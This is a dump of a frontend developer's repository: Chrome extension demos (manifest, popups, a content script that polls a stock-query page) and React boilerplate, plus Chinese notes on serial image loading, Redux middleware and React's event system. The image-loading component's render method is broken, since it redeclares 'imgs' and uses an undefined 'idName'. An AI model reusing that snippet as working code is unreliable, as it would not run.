52 | 		chrome.tabs.executeScript(chrome.devtools.inspectedWindow.tabId, {code: 'console.log(' + JSON.stringify(obj) + ')'}, function(){});
53 | 	}
54 | };
55 | 


--------------------------------------------------------------------------------
/react-test/public/index.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 |   <head>
 4 |     <meta charset="utf-8">
 5 |     <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
 6 |     <meta name="theme-color" content="#000000">
 7 |     <!--
 8 |       manifest.json provides metadata used when your web app is added to the
 9 |       homescreen on Android. See https://developers.google.com/web/fundamentals/engage-and-retain/web-app-manifest/
10 |     -->
11 |     <link rel="manifest" href="%PUBLIC_URL%/manifest.json">
12 |     <link rel="shortcut icon" href="%PUBLIC_URL%/favicon.ico">
13 |     <!--
14 |       Notice the use of %PUBLIC_URL% in the tags above.
15 |       It will be replaced with the URL of the `public` folder during the build.
16 |       Only files inside the `public` folder can be referenced from the HTML.
17 | 
18 |       Unlike "/favicon.ico" or "favicon.ico", "%PUBLIC_URL%/favicon.ico" will
19 |       work correctly both with client-side routing and a non-root public URL.
20 |       Learn how to configure a non-root public URL by running `npm run build`.
21 |     -->
22 |     <title>React App</title>
23 |   </head>
24 |   <body>
25 |     <noscript>
26 |       You need to enable JavaScript to run this app.
27 |     </noscript>
28 |     <div id="root"></div>
29 |     <!--
30 |       This HTML file is a template.
31 |       If you open it directly in the browser, you will see an empty page.
32 | 
33 |       You can add webfonts, meta tags, or analytics to this file.
34 |       The build step will place the bundled scripts into the <body> tag.
35 | 
36 |       To begin the development, run `npm start` or `yarn start`.
37 |       To create a production bundle, use `npm run build` or `yarn build`.
38 |     -->
39 |   </body>
40 | </html>
41 | 


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/css/custom.css:
--------------------------------------------------------------------------------
 1 | .chrome-plugin-demo-panel {
 2 | 	position: fixed;
 3 | 	right: 0;
 4 | 	bottom: 10px;
 5 | 	background: #3385ff;
 6 | 	padding: 10px;
 7 |     box-shadow: 0px 0px 10px #002761;
 8 |     border-radius: 3px;
 9 |     color: white;
10 | }
11 | .chrome-plugin-demo-panel a{
12 | 	color: white;
13 |     text-decoration: none;
14 | 	font-size: 16px;
15 | }
16 | .chrome-plugin-demo-panel a:hover{
17 |     text-decoration: underline;
18 |     color: #ffee08;
19 | }
20 | .chrome-plugin-simple-tip {
21 |     position: fixed;
22 |     left: 20px;
23 |     padding: 16px 10px;
24 |     top: 30px;
25 |     color: white;
26 |     min-width: 150px;
27 | 	max-width: 700px;
28 |     border-radius: 3px;
29 |     text-align: center;
30 |     font-size: 16px;
31 |     background: #70a800;
32 |     background-image: linear-gradient(to bottom, #95cc2a, #70a800);
33 |     box-shadow: 0 0 3px rgba(0, 0, 0, .2);
34 | 	transition: top .4s;
35 | }
36 | .animated {
37 |     -webkit-animation-duration: .5s;
38 |     animation-duration: .5s;
39 |     -webkit-animation-fill-mode: both;
40 |     animation-fill-mode: both
41 | }
42 | @-webkit-keyframes slideInLeft {
43 |     0% {
44 |         -webkit-transform: translate3d(-100%,0,0);
45 |         transform: translate3d(-100%,0,0);
46 |         visibility: visible
47 |     }
48 | 
49 |     100% {
50 |         -webkit-transform: translate3d(0,0,0);
51 |         transform: translate3d(0,0,0)
52 |     }
53 | }
54 | 
55 | @keyframes slideInLeft {
56 |     0% {
57 |         -webkit-transform: translate3d(-100%,0,0);
58 |         transform: translate3d(-100%,0,0);
59 |         visibility: visible
60 |     }
61 | 
62 |     100% {
63 |         -webkit-transform: translate3d(0,0,0);
64 |         transform: translate3d(0,0,0)
65 |     }
66 | }
67 | 
68 | .slideInLeft {
69 |     -webkit-animation-name: slideInLeft;
70 |     animation-name: slideInLeft
71 | }


--------------------------------------------------------------------------------
/src/图片串行加载.md:
--------------------------------------------------------------------------------
 1 | # 图片串行加载
 2 | 
 3 | ## 背景
 4 | 
 5 | 最近开发中遇到了一个比较好玩的问题：在一个页面中加载了20多张图片，其中第一张需要放大展示到中心区，由于所有图片时并行加载，导致中心图片加载特别慢，有很长时间是空白状态，体验非常差。思来想去，想到了如下方法，通过串行加载的方式来加载图片。
 6 | 
 7 | ## 解决方式
 8 | 
 9 | 通过render props的方式加入中间件
10 | 
11 | ```jsx
12 | import React from 'react';
13 | 
14 | class Index extends React.Component {
15 |   constructor(props) {
16 |     super(props);
17 |     this.state = {
18 |       loaded: {},
19 |     };
20 |     this.imgs = [];
21 |     this.preloadImgs(props.imgs);
22 |   }
23 |   componentWillReceiveProps(nextProps) {
24 |     let { imgs } = nextProps;
25 |     this.preloadImgs(imgs);
26 |   }
27 |   preloadImgs = imgs => {
28 |     let { defaultSrc = '', srcName = 'src', keyName = 'id' } = this.props;
29 |     imgs.forEach(img => {
30 |       let { id } = img;
31 |       if (this.state.loaded[id]) {
32 |         return;
33 |       }
34 |       if (this.imgs.some(item => item.id === img.id)) {
35 |         return;
36 |       }
37 |       this.imgs.push(img);
38 |       if (this.preloading) {
39 |         return;
40 |       }
41 |       this.preload(this.imgs.length - 1);
42 |     });
43 |   };
44 |   preload = index => {
45 |     index = index || 0;
46 |     if (index >= this.imgs.length) {
47 |       this.preloading = false;
48 |       return false;
49 |     }
50 |     this.preloading = true;
51 |     let { id } = this.imgs[index];
52 |     let oImg = new Image();
53 |     oImg.onload = () => {
54 |       this.setState({
55 |         loaded: {
56 |           ...this.state.loaded,
57 |           [id]: true,
58 |         },
59 |       });
60 |       this.preload(index + 1);
61 |     };
62 |     oImg.onerror = () => {
63 |       this.preload(index + 1);
64 |     };
65 |     oImg.src = this.imgs[index].src;
66 |   };
67 |   render() {
68 |     let { imgs, defaultSrc = '', srcName = 'src', keyName = 'id' } = this.props;
69 |     let imgs=imgs.map(item => ({ ...item, src: this.state.loaded[item[idName]] ? item[keyName] : defaultSrc }))
70 |     return this.props.children(imgs)
71 |   }
72 | }
73 | export default Index;
74 | ```
75 | 


--------------------------------------------------------------------------------
/examples/chrome-extension/js/content.js:
--------------------------------------------------------------------------------
 1 | (function(){
 2 |   var listeners = []
 3 |   var iframe = document.getElementById('contentIFrame0')
 4 |   var intervalCode = 0
 5 |   iframe.addEventListener('load', function(){
 6 |     for(var i= 0;i<listeners.length;i++){
 7 |       listeners.shift()()
 8 |     }
 9 |   })
10 |   chrome.runtime.onMessage.addListener(function(request, sender, sendResponse){
11 |     // console.log(sender.tab ?"from a content script:" + sender.tab.url :"from the extension");
12 |     if(request.type == 'start') {
13 |       var _document = iframe.contentWindow.document;
14 |       var codeList = request.payload.code.split(',')
15 |       var numberList = request.payload.number.split(',')
16 |       var interval = parseInt(request.payload.interval) || 10
17 |       var i = 0
18 |       clearInterval(intervalCode)
19 |       var cb = function(){
20 |         var _document = document.getElementById('contentIFrame0').contentWindow.document;
21 |         var code = codeList[i]
22 |         var number = 0
23 |         if(i>=numberList.length){
24 |           number = numberList[numberList.length-1]
25 |         }else{
26 |           number = numberList[i]
27 |         }
28 |         listeners.push(function(){
29 |           var list = _document.querySelectorAll('#tableList tr.odd-row td')
30 |           var name = list[1].innerText
31 |           var stock = list[list.length-1].innerText
32 |           var info = {name: name, stock: stock, code: code, number: number, time: getNowTime() }
33 |           sendMessageToPopup({type:'refresh', payload:info});
34 |         })
35 |         _document.getElementById('txtProduct').value=codeList[i]
36 |         _document.getElementById('btnSearch').click()
37 |         if(i>=codeList.length-1){
38 |           i=0
39 |         }else{
40 |           i++
41 |         }
42 |       }
43 |       cb()
44 |       intervalCode = setInterval(cb, interval*1000)
45 |     }
46 |   });
47 |   
48 |   function sendMessageToPopup(message){
49 |     chrome.runtime.sendMessage('gcjefpdikjlgpndiafaiffmbnjdphkph', message)
50 |   }
51 |   function getNowTime(){
52 |     var d = new Date()
53 |     return d.getHours() + ':' + d.getMinutes() + ':' + d.getSeconds()
54 |   }
55 | })()


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/popup.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <head>
 4 | 	<title>popup页</title>
 5 | 	<meta charset="utf-8"/>
 6 | 	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 7 | 	<style>
 8 | 	body {
 9 | 		font-family: 'Microsoft Yahei';
10 | 		width: 500px;
11 | 		min-height: 100px;
12 | 	}
13 | 	a {margin-right: 10px;}
14 | 	</style>
15 | </head>
16 | <body>
17 | 	<h1>这是一个popup页面！</h1>
18 | 	<h2>background</h2>
19 | 	<div>
20 | 		<a href="#" id="open_background">打开background</a>
21 | 		<a href="#" id="invoke_background_js">调用background页JS方法</a>
22 | 		<a href="#" id="get_background_title">获取background页的标题</a>
23 | 		<a href="#" id="set_background_title">设置background页标题</a>
24 | 		(验证background生命周期和单实例特性)
25 | 	</div>
26 | 	<h2>窗口操作演示</h2>
27 | 	<div>
28 | 		<a href="#" id="open_new_window">新窗口打开百度</a>
29 | 		<a href="#" id="custom_window_size">执行简单的窗口动画</a>
30 | 		<a href="#" id="max_current_window">将当前窗口最大化</a>
31 | 		<a href="#" id="min_current_window">将当前窗口最小化</a>
32 | 		<a href="#" id="close_current_window">关闭当前窗口所有标签(慎点)</a>
33 | 	</div>
34 | 	<h2>标签操作演示</h2>
35 | 	<div>
36 | 		<a href="#" id="open_url_new_tab">新标签打开百度</a>
37 | 		<a href="#" id="open_url_current_tab">当前标签打开网页</a>
38 | 		<a href="#" id="get_current_tab_id">获取当前标签页ID</a>
39 | 		<a href="#" id="highlight_tab">切换到第一个标签</a>
40 | 	</div>
41 | 	<h2>popup与content-script交互</h2>
42 | 	<div>
43 | 		<a href="#" id="send_message_to_content_script">短连接发送消息到content-script</a>
44 | 		<a href="#" id="connect_to_content_script">长连接发送消息到content-script</a>
45 | 	</div>
46 | 	<h2>DOM交互演示</h2>
47 | 	<div>
48 | 		<a href="#" id="update_bg_color">修改页面背景色(通过executeScript实现)</a>
49 | 		<a href="#" id="update_font_size">修改字体大小(通过sendMessage实现)</a>
50 | 	</div>
51 | 	<h2>国际化演示</h2>
52 | 	<div>
53 | 		<p><span id="test_i18n"></span> (另外请到插件列表页查看描述的变化)</p>
54 | 	</div>
55 | 	<h2>其它</h2>
56 | 	<div>
57 | 		<a href="#" id="show_badge">显示badge</a>
58 | 		<a href="#" id="hide_badge">隐藏badge</a>
59 | 		<a href="#" id="show_notification">显示桌面通知</a>
60 | 		<a href="#" id="check_media">检测网页视频</a>
61 | 	</div>
62 | 	<h2>更多</h2>
63 | 	<div>
64 | 		百度广告，右键菜单，omnibox，图片大小演示，devtools演示，sidebar演示，
65 | 	</div>
66 | 	<script type="text/javascript" src="js/jquery-1.8.3.js"></script>
67 | 	<script type="text/javascript" src="js/popup.js"></script>
68 | </body>
69 | </html>


--------------------------------------------------------------------------------
/examples/chrome-extension/popup.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <!-- saved from url=(0080)https://developer.chrome.com/extensions/examples/tutorials/getstarted/popup.html -->
 3 | <html>
 4 | <head>
 5 |     <meta charset="utf-8"/>
 6 |   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 7 |   <title>Getting Started Extension's Popup</title>
 8 |   <style>
 9 |     body {
10 |       margin: 10px;
11 |       white-space: nowrap;
12 |     }
13 | 
14 |     h1 {
15 |       font-size: 15px;
16 |     }
17 | 
18 |     #container {
19 |       width: 300px;
20 |       padding: 0px;
21 |     }
22 |     .row{
23 |       line-height: 40px;
24 |     }
25 |     .row .title{
26 |       width: 100px;
27 |       text-align: right;
28 |       display: inline-block;
29 |     }
30 |     .row input{
31 |       width: 150px;
32 |     }
33 |     .btn-wrapper{
34 |       text-align: center;
35 |     }
36 |     .name{
37 |       width: 100px;
38 |       max-width: 100px;
39 |       overflow: hidden;
40 |       word-break: break-all;
41 |       white-space: normal;
42 |     }
43 |     .stock{
44 |       max-width: 50px;
45 |     }
46 |     .time{
47 |       max-width: 80px;
48 |     }
49 |   </style>
50 | 
51 | </head>
52 | 
53 | <body>
54 |   <h1>自动查询库存量</h1>
55 |   <div id="container">
56 |     <div class='row'>
57 |       <span class='title'>商品码：</span>
58 |       <input id='code' type="text">
59 |     </div>
60 |     <div class='row'>
61 |       <span class='title'>数量：</span>
62 |       <input  id='number' type="text">
63 |     </div>
64 |     <!-- <div class='row'>
65 |       <span class='title'>轮询间隔时间(s)：</span>
66 |       <input  id='interval' type="text">
67 |     </div> -->
68 |     <div id="result">
69 |       结果
70 |       <table>
71 |         <tbody>
72 |           <tr>
73 |             <th>
74 |               商品名
75 |             </th>
76 |             <th>
77 |               最新库存量
78 |             </th>
79 |             <th>
80 |               更新事件
81 |             </th>
82 | 
83 |           </tr>
84 |         </tbody>
85 |       </table>
86 |     </div>
87 |     <div class='btn-wrapper'>
88 |       <button class="btn" id='start'>开始</button>
89 |     </div>
90 |   </div>
91 |   <!--
92 |     - JavaScript and HTML must be in separate files: see our Content Security
93 |     - Policy documentation[1] for details and explanation.
94 |     -
95 |     - [1]: https://developer.chrome.com/extensions/contentSecurityPolicy
96 |   -->
97 |   <script type="text/javascript" src="js/popup.js"></script>
98 | </body>
99 | </html>


--------------------------------------------------------------------------------
/react-test/src/logo.svg:
--------------------------------------------------------------------------------
1 | <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 841.9 595.3">
2 |     <g fill="#61DAFB">
3 |         <path d="M666.3 296.5c0-32.5-40.7-63.3-103.1-82.4 14.4-63.6 8-114.2-20.2-130.4-6.5-3.8-14.1-5.6-22.4-5.6v22.3c4.6 0 8.3.9 11.4 2.6 13.6 7.8 19.5 37.5 14.9 75.7-1.1 9.4-2.9 19.3-5.1 29.4-19.6-4.8-41-8.5-63.5-10.9-13.5-18.5-27.5-35.3-41.6-50 32.6-30.3 63.2-46.9 84-46.9V78c-27.5 0-63.5 19.6-99.9 53.6-36.4-33.8-72.4-53.2-99.9-53.2v22.3c20.7 0 51.4 16.5 84 46.6-14 14.7-28 31.4-41.3 49.9-22.6 2.4-44 6.1-63.6 11-2.3-10-4-19.7-5.2-29-4.7-38.2 1.1-67.9 14.6-75.8 3-1.8 6.9-2.6 11.5-2.6V78.5c-8.4 0-16 1.8-22.6 5.6-28.1 16.2-34.4 66.7-19.9 130.1-62.2 19.2-102.7 49.9-102.7 82.3 0 32.5 40.7 63.3 103.1 82.4-14.4 63.6-8 114.2 20.2 130.4 6.5 3.8 14.1 5.6 22.5 5.6 27.5 0 63.5-19.6 99.9-53.6 36.4 33.8 72.4 53.2 99.9 53.2 8.4 0 16-1.8 22.6-5.6 28.1-16.2 34.4-66.7 19.9-130.1 62-19.1 102.5-49.9 102.5-82.3zm-130.2-66.7c-3.7 12.9-8.3 26.2-13.5 39.5-4.1-8-8.4-16-13.1-24-4.6-8-9.5-15.8-14.4-23.4 14.2 2.1 27.9 4.7 41 7.9zm-45.8 106.5c-7.8 13.5-15.8 26.3-24.1 38.2-14.9 1.3-30 2-45.2 2-15.1 0-30.2-.7-45-1.9-8.3-11.9-16.4-24.6-24.2-38-7.6-13.1-14.5-26.4-20.8-39.8 6.2-13.4 13.2-26.8 20.7-39.9 7.8-13.5 15.8-26.3 24.1-38.2 14.9-1.3 30-2 45.2-2 15.1 0 30.2.7 45 1.9 8.3 11.9 16.4 24.6 24.2 38 7.6 13.1 14.5 26.4 20.8 39.8-6.3 13.4-13.2 26.8-20.7 39.9zm32.3-13c5.4 13.4 10 26.8 13.8 39.8-13.1 3.2-26.9 5.9-41.2 8 4.9-7.7 9.8-15.6 14.4-23.7 4.6-8 8.9-16.1 13-24.1zM421.2 430c-9.3-9.6-18.6-20.3-27.8-32 9 .4 18.2.7 27.5.7 9.4 0 18.7-.2 27.8-.7-9 11.7-18.3 22.4-27.5 32zm-74.4-58.9c-14.2-2.1-27.9-4.7-41-7.9 3.7-12.9 8.3-26.2 13.5-39.5 4.1 8 8.4 16 13.1 24 4.7 8 9.5 15.8 14.4 23.4zM420.7 163c9.3 9.6 18.6 20.3 27.8 32-9-.4-18.2-.7-27.5-.7-9.4 0-18.7.2-27.8.7 9-11.7 18.3-22.4 27.5-32zm-74 58.9c-4.9 7.7-9.8 15.6-14.4 23.7-4.6 8-8.9 16-13 24-5.4-13.4-10-26.8-13.8-39.8 13.1-3.1 26.9-5.8 41.2-7.9zm-90.5 125.2c-35.4-15.1-58.3-34.9-58.3-50.6 0-15.7 22.9-35.6 58.3-50.6 8.6-3.7 18-7 27.7-10.1 5.7 19.6 13.2 40 22.5 60.9-9.2 20.8-16.6 41.1-22.2 60.6-9.9-3.1-19.3-6.5-28-10.2zM310 490c-13.6-7.8-19.5-37.5-14.9-75.7 1.1-9.4 2.9-19.3 5.1-29.4 19.6 4.8 41 8.5 63.5 10.9 13.5 18.5 27.5 35.3 41.6 50-32.6 30.3-63.2 46.9-84 46.9-4.5-.1-8.3-1-11.3-2.7zm237.2-76.2c4.7 38.2-1.1 67.9-14.6 75.8-3 1.8-6.9 2.6-11.5 2.6-20.7 0-51.4-16.5-84-46.6 14-14.7 28-31.4 41.3-49.9 22.6-2.4 44-6.1 63.6-11 2.3 10.1 4.1 19.8 5.2 29.1zm38.5-66.7c-8.6 3.7-18 7-27.7 10.1-5.7-19.6-13.2-40-22.5-60.9 9.2-20.8 16.6-41.1 22.2-60.6 9.9 3.1 19.3 6.5 28.1 10.2 35.4 15.1 58.3 34.9 58.3 50.6-.1 15.7-23 35.6-58.4 50.6zM320.8 78.4z"/>
4 |         <circle cx="420.9" cy="296.5" r="45.7"/>
5 |         <path d="M520.5 78.1z"/>
6 |     </g>
7 | </svg>
8 | 


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/manifest.json:
--------------------------------------------------------------------------------
 1 | {
 2 | 	// 清单文件的版本，这个必须写，而且必须是2
 3 | 	"manifest_version": 2,
 4 | 	// 插件的名称
 5 | 	"name": "demo",
 6 | 	// 插件的版本
 7 | 	"version": "1.0.0",
 8 | 	// 插件描述
 9 | 	"description": "__MSG_pluginDesc__",
10 | 	// 图标，一般偷懒全部用一个尺寸的也没问题
11 | 	"icons":
12 | 	{
13 | 		"16": "img/icon.png",
14 | 		"48": "img/icon.png",
15 | 		"128": "img/icon.png"
16 | 	},
17 | 	// 会一直常驻的后台JS或后台页面
18 | 	"background":
19 | 	{
20 | 		// 2种指定方式，如果指定JS，那么会自动生成一个背景页
21 | 		"page": "background.html"
22 | 		//"scripts": ["js/background.js"]
23 | 	},
24 | 	// 浏览器右上角图标设置，browser_action、page_action、app必须三选一
25 | 	"browser_action": 
26 | 	{
27 | 		"default_icon": "img/icon.png",
28 | 		// 图标悬停时的标题，可选
29 | 		"default_title": "这是一个示例Chrome插件",
30 | 		"default_popup": "popup.html"
31 | 	},
32 | 	// 当某些特定页面打开才显示的图标
33 | 	/*"page_action":
34 | 	{
35 | 		"default_icon": "img/icon.png",
36 | 		"default_title": "我是pageAction",
37 | 		"default_popup": "popup.html"
38 | 	},*/
39 | 	// 需要直接注入页面的JS
40 | 	"content_scripts": 
41 | 	[
42 | 		{
43 | 			//"matches": ["http://*/*", "https://*/*"],
44 | 			// "<all_urls>" 表示匹配所有地址
45 | 			"matches": ["<all_urls>"],
46 | 			// 多个JS按顺序注入
47 | 			"js": ["js/jquery-1.8.3.js", "js/content-script.js"],
48 | 			// JS的注入可以随便一点，但是CSS的注意就要千万小心了，因为一不小心就可能影响全局样式
49 | 			"css": ["css/custom.css"],
50 | 			// 代码注入的时间，可选值： "document_start", "document_end", or "document_idle"，最后一个表示页面空闲时，默认document_idle
51 | 			"run_at": "document_start"
52 | 		},
53 | 		// 这里仅仅是为了演示content-script可以配置多个规则
54 | 		{
55 | 			"matches": ["*://*/*.png", "*://*/*.jpg", "*://*/*.gif", "*://*/*.bmp"],
56 | 			"js": ["js/show-image-content-size.js"]
57 | 		}
58 | 	],
59 | 	// 权限申请
60 | 	"permissions":
61 | 	[
62 | 		"contextMenus", // 右键菜单
63 | 		"tabs", // 标签
64 | 		"notifications", // 通知
65 | 		"webRequest", // web请求
66 | 		"webRequestBlocking", // 阻塞式web请求
67 | 		"storage", // 插件本地存储
68 | 		"http://*/*", // 可以通过executeScript或者insertCSS访问的网站
69 | 		"https://*/*" // 可以通过executeScript或者insertCSS访问的网站
70 | 	],
71 | 	// 普通页面能够直接访问的插件资源列表，如果不设置是无法直接访问的
72 | 	"web_accessible_resources": ["js/inject.js"],
73 | 	// 插件主页，这个很重要，不要浪费了这个免费广告位
74 | 	"homepage_url": "https://www.baidu.com",
75 | 	// 覆盖浏览器默认页面
76 | 	"chrome_url_overrides":
77 | 	{
78 | 		// 覆盖浏览器默认的新标签页
79 | 		"newtab": "newtab.html"
80 | 	},
81 | 	// Chrome40以前的插件配置页写法
82 | 	"options_page": "options.html",
83 | 	// Chrome40以后的插件配置页写法，如果2个都写，新版Chrome只认后面这一个
84 | 	"options_ui":
85 | 	{
86 | 		"page": "options.html",
87 | 		// 添加一些默认的样式，推荐使用
88 | 		"chrome_style": true
89 | 	},
90 | 	// 向地址栏注册一个关键字以提供搜索建议，只能设置一个关键字
91 | 	"omnibox": { "keyword" : "go" },
92 | 	// 默认语言
93 | 	"default_locale": "zh_CN",
94 | 	// devtools页面入口，注意只能指向一个HTML文件，不能是JS文件
95 | 	"devtools_page": "devtools.html"
96 | }


--------------------------------------------------------------------------------
/src/redux插件原理详解.md:
--------------------------------------------------------------------------------
  1 | # redux插件原理详解
  2 | 
  3 | 
  4 | ## 前言
  5 | 
  6 | redux本身代码量十分精简，出去注释，代码量也就100多行，大部分逻辑页非常好动。唯一有点难处的就是它的插件机制。
  7 | 
  8 | 本文目标便是帮助给为彻底理解redux的插件机制
  9 | 
 10 | ## 背景
 11 | 
 12 | 1. 本文介绍基于[redux-4.0.0](https://github.com/reduxjs/redux)
 13 | 2. 本文分析源码的源码文件为：
 14 |   - [createStore.js](https://github.com/reduxjs/redux/blob/master/src/createStore.js)
 15 |   - [applyMiddleware.js](https://github.com/reduxjs/redux/blob/master/src/applyMiddleware.js)
 16 |   - [compose.js](https://github.com/reduxjs/redux/blob/master/src/createStore.js)
 17 | 
 18 | ## 使用方法
 19 | 
 20 | ```jsx
 21 | import { createStore, applyMiddleware } from 'redux'
 22 | import reducer from './reducers'
 23 | import middleware from './middleware'
 24 | 
 25 | function logger(store) {
 26 |   return (next) => (action) => {
 27 |     let returnValue = next(action)
 28 |     return returnValue
 29 |   }
 30 | }
 31 | 
 32 | let store = createStore(
 33 |   reducer,
 34 |   [ 'Use Redux' ],
 35 |   applyMiddleware(middleware)
 36 | )
 37 | ```
 38 | 
 39 | 可以看到createStore接受三个参数，第一个参数为reducer，第二个参数为state的初始值，第三个参数为enhancer。
 40 | 
 41 | 接下来就让我们从createStore走进middleware。
 42 | 
 43 | ## createStore
 44 | 
 45 | ```jsx
 46 | createStore(reducer, preloadedState, enhancer) {
 47 | 
 48 |   // enhancer必须为函数，直接返回由enhancer生成的store
 49 |   if (typeof enhancer !== 'undefined') {
 50 |     if (typeof enhancer !== 'function') {
 51 |       throw new Error('Expected the enhancer to be a function.')
 52 |     }
 53 | 
 54 |     return enhancer(createStore)(reducer, preloadedState)
 55 |   }
 56 | 
 57 |   ...
 58 | }
 59 | ```
 60 | 
 61 | 可以看到一旦给createStore传入enhancer后，整个store都将由enhancer来生成，接下来我们来走进redux应用插件的enhancer，也就是前面的applyMiddleware(middleware)
 62 | 
 63 | ## applyMiddleware
 64 | 
 65 | ```jsx
 66 | import compose from './compose'
 67 | 
 68 | export default function applyMiddleware(...middlewares) {
 69 |   return createStore => (...args) => {
 70 |     // 通过传进来的createStore生成store
 71 |     const store = createStore(...args)
 72 |     // 构建middleware期间禁止调用dispatch
 73 |     let dispatch = () => {
 74 |       throw new Error(
 75 |         `Dispatching while constructing your middleware is not allowed. ` +
 76 |           `Other middleware would not be applied to this dispatch.`
 77 |       )
 78 |     }
 79 |     // 将要传给middleware的api
 80 |     const middlewareAPI = {
 81 |       getState: store.getState,
 82 |       dispatch: (...args) => dispatch(...args)
 83 |     }
 84 |     // 此处传入store
 85 |     const chain = middlewares.map(middleware => middleware(middlewareAPI))
 86 |     dispatch = compose(...chain)(store.dispatch)
 87 | 
 88 |     return {
 89 |       ...store,
 90 |       dispatch
 91 |     }
 92 |   }
 93 | }
 94 | 
 95 | ```
 96 | 
 97 | 以上就是applymiddleWare的全部代码了，最后再来了解下compose
 98 | 
 99 | ## compose
100 | 
101 | ```jsx
102 | function compose(...funcs) {
103 |   if (funcs.length === 0) {
104 |     return arg => arg
105 |   }
106 | 
107 |   if (funcs.length === 1) {
108 |     return funcs[0]
109 |   }
110 |   // 注册时从左往右执行，
111 |   return funcs.reduce((a, b) => (...args) => a(b(...args)))
112 | }
113 | 
114 | ```
115 | 嗯，没错compose的代码更少，如果middleWare为[fn1, fn2, fn3],则compose后的顺序为fn1(fn2(fn3(dispatch)))


--------------------------------------------------------------------------------
/src/react16-事件系统分析.md:
--------------------------------------------------------------------------------
  1 | # react源码分析-事件系统分析
  2 | ![原型图](https://raw.githubusercontent.com/luke93h/git-blog/master/imgs/event.png)
  3 | 
  4 | ## 目录
  5 | - [前言](#前言)
  6 | - [注册](#注册)
  7 |   - [trapBubbledEvent](#trapBubbledEvent)
  8 | - [触发](#触发)
  9 |   - [dispatchInteractiveEvent](#dispatchInteractiveEvent)
 10 |   - [dispatchEvent](#dispatchEvent)
 11 |   - [handleTopLevel](#handleTopLevel)
 12 |   - [runExtractedEventsInBatch](#runExtractedEventsInBatch)
 13 |   - [SyntheticEvent](#SyntheticEvent)
 14 |   - [traverseTwoPhase](#traverseTwoPhase)
 15 |   - [executeDispatchesInOrder](#executeDispatchesInOrder)
 16 | 
 17 | ## 前言
 18 | 
 19 | 在开发react项目时，是否有过这样的困惑：
 20 | 1. react每次render后，会在dom上重新注册事件监听函数吗？
 21 | 2. 事件监听函数里面的event是原生的event吗？如果不是，是如何生成的呢？
 22 | 
 23 | 
 24 | ## 注册
 25 | 
 26 | ## trapBubbledEvent
 27 | 
 28 | 监听冒泡事件,由用户触发的事件绑定的监听函数为dispatchInteractiveEvent
 29 | 
 30 | ## 触发
 31 | 
 32 | ## dispatchInteractiveEvent
 33 | 
 34 | 调用dispatchEvent
 35 | 
 36 | ## dispatchEvent
 37 | 
 38 | 在createInstance时，会在对应的dom对象上保存对应的fiber实例，dispatchEvent就是从dom实例上获取对应的fiber信息的
 39 | ```jsx
 40 | function precacheFiberNode(hostInst, node) {
 41 |   node[internalInstanceKey] = hostInst;
 42 | }
 43 | ```
 44 | 
 45 | booking中保存有4个信息：
 46 | 1. ancestors: 祖先元素
 47 | 2. nativeEvent: 原生event对象
 48 | 3. targetInst: target对应的fiber
 49 | 4. topLevelType: 事件类型
 50 | 
 51 | ## handleTopLevel
 52 | 
 53 | handleTopLevel接受booking作为参数，在此步骤中会填充ancestors对象
 54 | 
 55 | ## runExtractedEventsInBatch
 56 | 
 57 | runExtractedEventsInBatch里面分为两个步骤，一是生成事件对象，而是触发事件
 58 | 
 59 | ## SyntheticEvent
 60 | 
 61 | 生成react的事件对象时，最终要的就是SyntheticEvent这个构造函数了。
 62 | 接下来来分析下SyntheticEvent构造函数调用时所作的事情，以及一些方法
 63 | 
 64 | ### 构造函数
 65 | 
 66 | 会根据Interface上的内容，将原生对象上的属性拷贝到当前实例上
 67 | 
 68 | ### preventDefault、stopPropagation
 69 | 
 70 | 模拟原生的方法，并调用原生的方法，但只能组织到document一层，因为事件函数注册在document上，调用后会在event上标记变量
 71 | 
 72 | ### persist
 73 | 
 74 | 标记isPersistent为true
 75 | 
 76 | ### destructor
 77 | 
 78 | 将当前实例上的属性清空
 79 | 
 80 | ### SyntheticEvent.Interface
 81 | 
 82 | 接口，event上需要哪些数据
 83 | 
 84 | ### SyntheticEvent.extend
 85 | 
 86 | 扩展Interface，并生成新的构造函数
 87 | 
 88 | ### addEventPoolingTo
 89 | 
 90 | EventConstructor的扩展功能，有三个属性
 91 | 1. eventPool：用于保存废弃的event
 92 | 2. getPooled: 获取旧的event引用
 93 | 3. release: 初始化并保存event实例
 94 | 
 95 | ## traverseTwoPhase
 96 | towPhase是指捕获阶段和冒泡阶段。
 97 | 
 98 | 通过listenerAtPhase获取监听函数，然后在event上保存linstener和instance
 99 | ```jsx
100 | function accumulateDirectionalDispatches(inst, phase, event) {
101 |   var listener = listenerAtPhase(inst, event, phase);
102 |   if (listener) {
103 |     event._dispatchListeners = accumulateInto(event._dispatchListeners, listener);
104 |     event._dispatchInstances = accumulateInto(event._dispatchInstances, inst);
105 |   }
106 | }
107 | ```
108 | 
109 | ## listenerAtPhase
110 | 
111 | 通过node[internalEventHandlersKey]获取属性，然后获得相应的监听函数，该属性在createInstance阶段被保存在dom对象上
112 | 
113 | ## executeDispatch
114 | 
115 | 从event上获得instance和listener
116 | 
117 | ## ReactErrorUtils.invokeGuardedCallbackAndCatchFirstError
118 | 
119 | 创建一个fakeDom，在fakeDom上绑定事件，并处罚事件，在事件监听函数中调用listener
120 | 
121 | ## 后续
122 | 
123 | 在执行完事件监听函数后，流程跳转至performWorkOnRoot，会更新react tree
124 | 
125 | 
126 | ## 相关
127 | 
128 | 
129 | - [react源码分析-reactDom.render](https://github.com/luke93h/git-blog/issues/7)
130 | - [setState分析](https://github.com/luke93h/git-blog/issues/11)
131 | 


--------------------------------------------------------------------------------
/react-test/src/registerServiceWorker.js:
--------------------------------------------------------------------------------
  1 | // In production, we register a service worker to serve assets from local cache.
  2 | 
  3 | // This lets the app load faster on subsequent visits in production, and gives
  4 | // it offline capabilities. However, it also means that developers (and users)
  5 | // will only see deployed updates on the "N+1" visit to a page, since previously
  6 | // cached resources are updated in the background.
  7 | 
